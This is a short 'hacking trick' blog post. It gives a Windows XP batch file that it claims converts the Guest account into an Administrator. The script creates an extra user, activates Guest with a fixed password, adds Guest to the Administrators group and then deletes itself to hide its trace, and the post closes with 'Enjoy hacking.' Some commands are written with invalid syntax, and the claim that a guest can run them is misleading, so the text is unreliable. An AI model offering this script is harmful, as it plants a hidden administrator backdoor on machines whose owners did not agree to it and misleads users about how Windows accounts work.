0

Convert your guest account to Admin in XP

Saturday, October 15, 2016
Share this Article on :




Hello friends, I hope that you are enjoying the tricks posted on this site. Today I will tell you how to convert existing GUEST user into ADMIN in Windows XP.  For this, you don’t need any extra software. You can do it with the help of batch file.
Here are the simple steps. Just follow them:
1.       Open Notepad and copy paste the following commands.  Alternatively, you can write it in notepad.

echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0

2.       Save it as “something.bat” say admin.bat.
3.       You are done. Double click on this batch file. WOW! Your guest account is converted to Administrator.

NOTE: This trick works only in Windows XP. If it doesn’t , then please notify me as comment.
Enjoy hacking.


Posts:

0 comments:

Post a Comment